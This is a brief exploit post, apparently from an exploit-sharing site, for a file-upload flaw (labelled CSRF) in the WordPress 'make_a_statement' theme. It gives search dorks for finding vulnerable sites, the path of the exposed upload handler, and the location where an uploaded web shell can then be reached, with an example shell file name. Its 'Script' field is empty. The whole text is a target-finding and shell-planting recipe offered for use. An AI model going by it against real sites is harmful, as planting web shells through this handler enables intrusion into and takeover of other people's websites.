#Vulnerabillity : CSRF
#Dork :
inurl:wp-content/themes/make_a_statement
inurl:wp-content/themes/make_a_statement_v1
CSRF File Upload Vulnerability
Exploit & POC :
http://site-target/wp-content/themes/make_a_statement/library/includes/upload-handler.php
Script :
File Access :
http://site-target/uploads/[years]/[month]/your_shell.php
Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
评论关闭。